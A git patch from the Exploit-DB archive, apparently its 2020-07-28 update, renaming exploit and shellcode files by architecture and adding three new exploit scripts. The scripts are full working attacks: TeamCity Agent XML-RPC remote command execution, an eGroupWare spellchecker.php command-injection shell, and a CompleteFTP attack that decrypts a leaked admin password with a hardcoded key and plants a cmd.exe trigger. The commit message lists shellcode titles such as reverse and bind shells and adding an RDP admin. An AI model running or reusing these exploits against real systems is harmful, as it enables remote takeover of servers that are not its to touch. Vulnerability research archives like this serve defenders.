From 720fabd0666423c25675eb8ff42161ec1264fd65 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 28 Jul 2020 05:01:59 +0000 Subject: [PATCH] DB: 2020-07-28 114 changes to exploits/shellcodes Notepad++ < 7.7 (x64) - Denial of Service winrar 5.80 64bit - Denial of Service WinRAR 5.80 (x64) - Denial of Service Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017) Microsoft Word 2007 (x86) - Information Disclosure IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution Microsoft Internet Explorer 11 (Windows 7 x86/x64) - vbscript Code Execution Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass) MySQL User-Defined (Linux) (x32/x86_64) - 'sys_exec' Local Privilege Escalation MySQL User-Defined (Linux) (x86) - 'sys_exec' Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows (x86) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass) Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x64) - 'AF_PACKET' Race Condition Privilege Escalation Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH) Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path DEWESoft X3 SP1 (64-bit) - Remote Command Execution DEWESoft X3 SP1 (x64) - Remote Command Execution CompleteFTP Professional 12.1.3 - Remote Code Execution TeamCity Agent XML-RPC 10.0 - Remote Code Execution eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) FreeBSD x86/x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes) Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) Linux/x86 - Kill All Processes Shellcode (14 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes) Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes) Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes) Linux/x86 - Bind Shell Generator Shellcode (114 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) --- .../{linux => linux_x86-64}/local/44299.c | 0 .../{linux => linux_x86-64}/local/44300.c | 0 .../{linux => linux_x86-64}/local/44302.c | 0 .../{linux => linux_x86-64}/local/45516.c | 0 exploits/{linux => linux_x86}/local/46249.py | 0 exploits/php/webapps/48201.py | 353 ++++++++++++++++++ exploits/php/webapps/48720.py | 51 +++ exploits/windows/remote/48657.py | 332 ++++++++++++++++ .../{windows => windows_x86-64}/dos/47393.txt | 0 .../{windows => windows_x86-64}/dos/47525.txt | 0 .../{windows => windows_x86-64}/local/43139.c | 0 .../local/45738.py | 0 .../local/47122.py | 0 .../{linux => windows_x86-64}/local/47170.c | 0 .../remote/44275.txt | 0 .../{windows => windows_x86}/local/38457.c | 0 .../{windows => windows_x86}/local/42432.cpp | 0 .../{windows => windows_x86}/local/42930.txt | 0 .../{windows => windows_x86}/local/43366.md | 0 .../{windows => windows_x86}/local/46507.py | 0 .../{windows => windows_x86}/local/46918.txt | 0 .../{windows => windows_x86}/local/47176.cpp | 0 .../{windows => windows_x86}/local/48314.py | 0 .../{windows => windows_x86}/local/48352.txt | 0 files_exploits.csv | 51 +-- files_shellcodes.csv | 34 +- shellcodes/{linux => linux_x86-64}/48379.c | 0 shellcodes/{linux => linux_x86}/45940.nasm | 0 shellcodes/{linux => linux_x86}/46039.c | 0 shellcodes/{linux => linux_x86}/47481.c | 0 shellcodes/{linux => linux_x86}/47511.c | 0 shellcodes/{linux => linux_x86}/47513.c | 0 shellcodes/{linux => linux_x86}/47514.c | 0 shellcodes/{linux => linux_x86}/47530.txt | 0 shellcodes/{linux => linux_x86}/47564.py | 0 shellcodes/{linux => linux_x86}/47877.c | 0 shellcodes/{linux => linux_x86}/47890.c | 0 shellcodes/{linux => linux_x86}/48032.py | 0 shellcodes/{linux => linux_x86}/48243.txt | 0 .../{windows => windows_x86-64}/48229.txt | 0 shellcodes/{windows => windows_x86}/47980.txt | 0 shellcodes/{windows => windows_x86}/48355.c | 0 42 files changed, 780 insertions(+), 41 deletions(-) rename exploits/{linux => linux_x86-64}/local/44299.c (100%) rename exploits/{linux => linux_x86-64}/local/44300.c (100%) rename exploits/{linux => linux_x86-64}/local/44302.c (100%) rename exploits/{linux => linux_x86-64}/local/45516.c (100%) rename exploits/{linux => linux_x86}/local/46249.py (100%) create mode 100755 exploits/php/webapps/48201.py create mode 100755 exploits/php/webapps/48720.py create mode 100755 exploits/windows/remote/48657.py rename exploits/{windows => windows_x86-64}/dos/47393.txt (100%) rename exploits/{windows => windows_x86-64}/dos/47525.txt (100%) rename exploits/{windows => windows_x86-64}/local/43139.c (100%) rename exploits/{windows => windows_x86-64}/local/45738.py (100%) rename exploits/{windows => windows_x86-64}/local/47122.py (100%) rename exploits/{linux => windows_x86-64}/local/47170.c (100%) rename exploits/{windows => windows_x86-64}/remote/44275.txt (100%) rename exploits/{windows => windows_x86}/local/38457.c (100%) rename exploits/{windows => windows_x86}/local/42432.cpp (100%) rename exploits/{windows => windows_x86}/local/42930.txt (100%) rename exploits/{windows => windows_x86}/local/43366.md (100%) rename exploits/{windows => windows_x86}/local/46507.py (100%) rename exploits/{windows => windows_x86}/local/46918.txt (100%) rename exploits/{windows => windows_x86}/local/47176.cpp (100%) rename exploits/{windows => windows_x86}/local/48314.py (100%) rename exploits/{windows => windows_x86}/local/48352.txt (100%) rename shellcodes/{linux => linux_x86-64}/48379.c (100%) rename shellcodes/{linux => linux_x86}/45940.nasm (100%) rename shellcodes/{linux => linux_x86}/46039.c (100%) rename shellcodes/{linux => linux_x86}/47481.c (100%) rename shellcodes/{linux => linux_x86}/47511.c (100%) rename shellcodes/{linux => linux_x86}/47513.c (100%) rename shellcodes/{linux => linux_x86}/47514.c (100%) rename shellcodes/{linux => linux_x86}/47530.txt (100%) rename shellcodes/{linux => linux_x86}/47564.py (100%) rename shellcodes/{linux => linux_x86}/47877.c (100%) rename shellcodes/{linux => linux_x86}/47890.c (100%) rename shellcodes/{linux => linux_x86}/48032.py (100%) rename shellcodes/{linux => linux_x86}/48243.txt (100%) rename shellcodes/{windows => windows_x86-64}/48229.txt (100%) rename shellcodes/{windows => windows_x86}/47980.txt (100%) rename shellcodes/{windows => windows_x86}/48355.c (100%) diff --git a/exploits/linux/local/44299.c b/exploits/linux_x86-64/local/44299.c similarity index 100% rename from exploits/linux/local/44299.c rename to exploits/linux_x86-64/local/44299.c diff --git a/exploits/linux/local/44300.c b/exploits/linux_x86-64/local/44300.c similarity index 100% rename from exploits/linux/local/44300.c rename to exploits/linux_x86-64/local/44300.c diff --git a/exploits/linux/local/44302.c b/exploits/linux_x86-64/local/44302.c similarity index 100% rename from exploits/linux/local/44302.c rename to exploits/linux_x86-64/local/44302.c diff --git a/exploits/linux/local/45516.c b/exploits/linux_x86-64/local/45516.c similarity index 100% rename from exploits/linux/local/45516.c rename to exploits/linux_x86-64/local/45516.c diff --git a/exploits/linux/local/46249.py b/exploits/linux_x86/local/46249.py similarity index 100% rename from exploits/linux/local/46249.py rename to exploits/linux_x86/local/46249.py diff --git a/exploits/php/webapps/48201.py b/exploits/php/webapps/48201.py new file mode 100755 index 000000000..ffe02324e --- /dev/null +++ b/exploits/php/webapps/48201.py @@ -0,0 +1,353 @@ +# Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution +# Date: 2020-03-20 +# Exploit Author: Dylan Pindur +# Vendor Homepage: https://www.jetbrains.com/teamcity/ +# Version: TeamCity < 10.0 (42002) +# Tested on: Windows 10 (x64) +# References: +# https://www.exploit-db.com/exploits/45917 +# https://www.tenable.com/plugins/nessus/94675 +# +# TeamCity Agents configured to use bidirectional communication allow the execution +# of commands sent to them via an XML-RPC endpoint. +# +# This script requires the following python modules are installed +# pip install requests +# +#!/usr/local/bin/python3 + +import requests +import sys + +# region tc7 +teamcity_7_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + ON_AGENT + x + + + + system.build.number + 0 + + + + + + + + + + + + + + + + + + + + simpleRunner + x + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + + teamcity.build.step.name + x + + + + + 3 + + + ]]> + + + + +""".strip() +# endregion + +# region tc8 +teamcity_8_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + ON_AGENT + x + + + system.build.number + 0 + + + + + + + + + + + + + + + + x + false + simpleRunner + x + + + + teamcity.build.step.name + x + + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + 3 + + + ]]> + + + + +""".strip() +# endregion + +# region tc9 +teamcity_9_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + x + ON_AGENT + x + 3 + + system.build.number + 0 + + + + + + + + + + + + + + + + x + false + simpleRunner + x + + + + teamcity.build.step.name + x + + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + + ]]> + + + + +""".strip() +# endregion + +# region tc10 +teamcity_10_req = """ + + + buildAgent.runBuild + + + + + 123456 + x + x + ON_AGENT + x + 123456 + x + 3 + + system.build.number + 0 + + + + + + + + + + + + + + + + + x + false + simpleRunner + x + + + + teamcity.build.step.name + x + + + + + script.content + {SCRIPT} + + + teamcity.step.mode + default + + + use.custom.script + true + + + + + + ]]> + + + + +""".strip() +# endregion + +def prepare_payload(version, cmd): + if version == 7: + return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + elif version == 8: + return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + elif version == 9: + return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + elif version == 10: + return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) + else: + raise Exception("No payload available for version {}".format(version)) + +def send_req(host, port, payload): + headers = { + "Content-Type": "text/xml" + } + url = "http://{}:{}/".format(host, port) + r = requests.post(url, headers=headers, data=payload) + if r.status_code == 200 and 'fault' not in r.text: + print('Command sent successfully') + else: + print('Command failed') + print(r.text) + + +if len(sys.argv) != 4: + print('[!] Missing arguments') + print('[ ] Usage: {} '.format(sys.argv[0])) + print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0])) + sys.exit(1) + +target = sys.argv[1] +port = int(sys.argv[2]) +cmd = sys.argv[3] + +version = input("Enter TeamCity version (7,8,9,10): ") +version = int(version.strip()) +if version not in [7, 8, 9, 10]: + print("Please select a valid version (7,8,9,10)") + sys.exit(1) + +payload = prepare_payload(version, cmd) +send_req(target, str(port), payload) \ No newline at end of file diff --git a/exploits/php/webapps/48720.py b/exploits/php/webapps/48720.py new file mode 100755 index 000000000..bfc5649ac --- /dev/null +++ b/exploits/php/webapps/48720.py @@ -0,0 +1,51 @@ +# Exploit Title: eGroupWare 1.14 - 'spellchecker.php' Remote Command Execution +# Date: 2020-07-27 +# Exploit Author: Berk KIRAS +# Vendor Homepage: https://www.egroupware.org/en/ +# Version: 1.14 +# Tested on: Apache +# Berk KIRAS PwC - Cyber Security Specialist + + +#!/usr/bin/python3 + +import requests +import sys +import threading +import urllib + +def send_req(command): + #Headers + my_datas_headers ={ + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", + "Accept": "text/javascript, text/html, application/xml, text/xml, */*", + "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-type": "application/json; charset=UTF-8", + "Connection": "close", + } + #If you want to edit and add headers some headers added + s = requests.session() + #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'} + s.headers.update(my_datas_headers) + params={"q":"||"+command+"||"} + command_encoded = urllib.urlencode(params) + command_encoded = command_encoded.split("=")[1] + r = s.get(sys.argv[1]+"://"+sys.argv[2]+"/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/"+"spellchecker.php?spellchecker_lang=egroupware_spellchecker_cmd_exec.nasl"+command_encoded) + return r.content + +def main(): + if(len(sys.argv) < 3): + print("Usage:exploit.py ") + sys.exit(0) + else: + try: + while True: + cmd = raw_input("CMD_>") + resp=send_req(cmd).split(";")[5].split("2>&1")[1] + print(resp) + + except Exception: + print(Exception) + +main() \ No newline at end of file diff --git a/exploits/windows/remote/48657.py b/exploits/windows/remote/48657.py new file mode 100755 index 000000000..1509cde3f --- /dev/null +++ b/exploits/windows/remote/48657.py @@ -0,0 +1,332 @@ +# Exploit Title: CompleteFTP Professional 12.1.3 - Remote Code Execution +# Date: 2020-03-11 +# Exploit Author: 1F98D +# Original Author: Rhino Security Labs +# Vendor Homepage: https://enterprisedt.com/products/completeftp/ +# Version: CompleteFTP Professional +# Tested on: Windows 10 (x64) +# CVE: CVE‑2019‑16116 +# References: +# https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/ +# https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116 +# +# CompleteFTP before 12.1.3 logs an obscured administrator password to a file +# during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log) +# if CompleteFTP is configured to permit remote administration (over port 14983) it +# is possible to obtain remote code execution through the administration interface +# +# This script requires the following python modules are installed +# pip install paramiko pycryptodome uuid +# +#!/usr/local/bin/python3 + +from paramiko.sftp import CMD_EXTENDED +from base64 import b64encode, b64decode +from Crypto.Util.Padding import unpad +from Crypto.Cipher import DES3 +import xml.etree.ElementTree as ET +import paramiko +import struct +import uuid +import sys + +# region get_server_info +get_server_info = """ + + + + + + +""".strip() +# endregion + +# region update_config +update_config = """ + + + + + + + +{XMLSCHEMA} +{XMLDIFFGRAM} + + +<_Major>2 +<_Minor>0 +<_Build>-1 +<_Revision>-1 + + + +""".strip() +# endregion + +# region xml_schema +xml_schema = """ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +""".replace("<", "<").replace(">", ">").replace('"', """).strip() +# endregion + +# region xml_diffgram +xml_diffgram = """ + + + + 88428040-73b3-4497-9b6d-69af2f1cc3c7 + Process Execution + EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger + 2 + {CONFIGURATION} + 2020-03-10T18:33:41.107+08:00 + 2020-03-10T10:52:00.7496654+08:00 + false + true + {ID} + + + 2 + Event + 2009-06-29T11:48:00+08:00 + 2009-06-29T11:48:00+08:00 + + + + 3 + 2020-03-10T10:50:44.4209655+08:00 + 2020-03-10T10:50:44.4209655+08:00 + true + + + + + 88428040-73b3-4497-9b6d-69af2f1cc3c7 + Process Execution + EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger + 2 + + 2020-03-10T18:33:41.107+08:00 + 2020-03-10T10:50:44.4209655+08:00 + false + true + + + + +""".strip() +# endregion + +# region config +config = """ + + + 0 + 10 + 0 + 0 + true + + + 1 + 0 + trigger + true + 0 + cmd.exe + /c {CMD} + * + false + true + 1 + + + 1 + LogIn + + +""".strip() +# endregion + +def prepare_update_config(uuid, cmd): + config_payload = config + config_payload = config_payload.replace('{CMD}', cmd) + config_payload = config_payload.replace('<', '<') + config_payload = config_payload.replace('>', '>') + + diffgram_payload = xml_diffgram + diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload) + diffgram_payload = diffgram_payload.replace('{ID}', uuid) + diffgram_payload = diffgram_payload.replace('&', '&') + diffgram_payload = diffgram_payload.replace('<', '<') + diffgram_payload = diffgram_payload.replace('>', '>') + diffgram_payload = diffgram_payload.replace('"', '"') + + payload = update_config + payload = payload.replace('{XMLSCHEMA}', xml_schema) + payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload) + + return payload + +def send_request(sftp, payload): + payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8') + res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload) + return res + +def convert_changeset_id_to_uuid(changeset_id): + a = struct.pack('i', int(changeset_id[0].text)) # 32 + b = struct.pack('h', int(changeset_id[1].text)) # 16 + c = struct.pack('h', int(changeset_id[2].text)) # 16 + d = struct.pack('B', int(changeset_id[3].text)) # 8 + e = struct.pack('B', int(changeset_id[4].text)) # 8 + f = struct.pack('B', int(changeset_id[5].text)) # 8 + g = struct.pack('B', int(changeset_id[6].text)) # 8 + h = struct.pack('B', int(changeset_id[7].text)) # 8 + i = struct.pack('B', int(changeset_id[8].text)) # 8 + j = struct.pack('B', int(changeset_id[9].text)) # 8 + k = struct.pack('B', int(changeset_id[10].text)) # 8 + + x = a + b + c + d + e + f + g + h + i + j + k + return uuid.UUID(bytes_le=x) + +def get_uuid(sftp): + res = send_request(sftp, get_server_info) + if res[0] != 201: + print('[!] Error could not request server info via SFTP') + sys.exit(1) + + res = b64decode(res[1].get_string()).decode('utf-8') + res = ET.fromstring(res) + changeset_id = res.find('.//SyncChangeSetID') + uuid = convert_changeset_id_to_uuid(changeset_id) + return str(uuid) + +def login(host, port, user, password): + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + ssh.connect(host, port, user, password, look_for_keys=False) + return ssh.open_sftp() + +def send_command(sftp, cmd): + uuid = get_uuid(sftp) + payload = prepare_update_config(uuid, cmd) + res = send_request(sftp, payload) + if res[0] != 201: + print('[!] Error could not send update config request via SFTP') + sys.exit(1) + +def decrypt_password(password): + key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E') + iv = b64decode('gVGow/9uLvM=') + encrypted = b64decode(password) + cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC) + decrypted = cipher.decrypt(encrypted) + return unpad(decrypted, 8).decode('utf-16') + +if len(sys.argv) != 6: + print('[!] Missing arguments') + print('[ ] Usage: {} '.format(sys.argv[0])) + print("[ ] E.g. {} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0])) + sys.exit(1) + +target = sys.argv[1] +port = int(sys.argv[2]) +username = sys.argv[3] +password = sys.argv[4] +cmd = sys.argv[5] + +print('[ ] Decrypting password') +password = decrypt_password(password) +print('[ ] Decrypted password is "{}"'.format(password)) + +print('[ ] Logging in') +sftp = login(target, port, username, password) + +print('[ ] Sending command') +send_command(sftp, cmd) + +print('[ ] Command successfully sent, triggering...') +sftp = login(target, port, username, password) \ No newline at end of file diff --git a/exploits/windows/dos/47393.txt b/exploits/windows_x86-64/dos/47393.txt similarity index 100% rename from exploits/windows/dos/47393.txt rename to exploits/windows_x86-64/dos/47393.txt diff --git a/exploits/windows/dos/47525.txt b/exploits/windows_x86-64/dos/47525.txt similarity index 100% rename from exploits/windows/dos/47525.txt rename to exploits/windows_x86-64/dos/47525.txt diff --git a/exploits/windows/local/43139.c b/exploits/windows_x86-64/local/43139.c similarity index 100% rename from exploits/windows/local/43139.c rename to exploits/windows_x86-64/local/43139.c diff --git a/exploits/windows/local/45738.py b/exploits/windows_x86-64/local/45738.py similarity index 100% rename from exploits/windows/local/45738.py rename to exploits/windows_x86-64/local/45738.py diff --git a/exploits/windows/local/47122.py b/exploits/windows_x86-64/local/47122.py similarity index 100% rename from exploits/windows/local/47122.py rename to exploits/windows_x86-64/local/47122.py diff --git a/exploits/linux/local/47170.c b/exploits/windows_x86-64/local/47170.c similarity index 100% rename from exploits/linux/local/47170.c rename to exploits/windows_x86-64/local/47170.c diff --git a/exploits/windows/remote/44275.txt b/exploits/windows_x86-64/remote/44275.txt similarity index 100% rename from exploits/windows/remote/44275.txt rename to exploits/windows_x86-64/remote/44275.txt diff --git a/exploits/windows/local/38457.c b/exploits/windows_x86/local/38457.c similarity index 100% rename from exploits/windows/local/38457.c rename to exploits/windows_x86/local/38457.c diff --git a/exploits/windows/local/42432.cpp b/exploits/windows_x86/local/42432.cpp similarity index 100% rename from exploits/windows/local/42432.cpp rename to exploits/windows_x86/local/42432.cpp diff --git a/exploits/windows/local/42930.txt b/exploits/windows_x86/local/42930.txt similarity index 100% rename from exploits/windows/local/42930.txt rename to exploits/windows_x86/local/42930.txt diff --git a/exploits/windows/local/43366.md b/exploits/windows_x86/local/43366.md similarity index 100% rename from exploits/windows/local/43366.md rename to exploits/windows_x86/local/43366.md diff --git a/exploits/windows/local/46507.py b/exploits/windows_x86/local/46507.py similarity index 100% rename from exploits/windows/local/46507.py rename to exploits/windows_x86/local/46507.py diff --git a/exploits/windows/local/46918.txt b/exploits/windows_x86/local/46918.txt similarity index 100% rename from exploits/windows/local/46918.txt rename to exploits/windows_x86/local/46918.txt diff --git a/exploits/windows/local/47176.cpp b/exploits/windows_x86/local/47176.cpp similarity index 100% rename from exploits/windows/local/47176.cpp rename to exploits/windows_x86/local/47176.cpp diff --git a/exploits/windows/local/48314.py b/exploits/windows_x86/local/48314.py similarity index 100% rename from exploits/windows/local/48314.py rename to exploits/windows_x86/local/48314.py diff --git a/exploits/windows/local/48352.txt b/exploits/windows_x86/local/48352.txt similarity index 100% rename from exploits/windows/local/48352.txt rename to exploits/windows_x86/local/48352.txt diff --git a/files_exploits.csv b/files_exploits.csv index a47226220..0c72d14a4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6579,7 +6579,7 @@ id,file,description,date,author,type,platform,port 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows, -47393,exploits/windows/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows, +47393,exploits/windows_x86-64/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows_x86-64, 47404,exploits/watchos/dos/47404.pl,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-20,"Emilio Revelo",dos,watchos, 47406,exploits/watchos/dos/47406.py,"InputMapper 1.6.10 - Denial of Service",2019-09-23,elkoyote07,dos,watchos, 47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows, @@ -6602,7 +6602,7 @@ id,file,description,date,author,type,platform,port 47489,exploits/windows/dos/47489.txt,"Microsoft Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows, 47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows, 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows, -47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows, +47525,exploits/windows_x86-64/dos/47525.txt,"WinRAR 5.80 (x64) - Denial of Service",2019-10-21,alblalawi,dos,windows_x86-64, 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows, 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple, 47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows, @@ -10032,7 +10032,7 @@ id,file,description,date,author,type,platform,port 40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux, 40039,exploits/windows_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,local,windows_x86, 40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,local,windows, -40049,exploits/linux_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,linux_x86-64, +40049,exploits/linux_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter 'target_offset' Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,linux_x86-64, 40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",local,android, 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows, 40071,exploits/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows, @@ -10204,7 +10204,7 @@ id,file,description,date,author,type,platform,port 41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows, 41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian 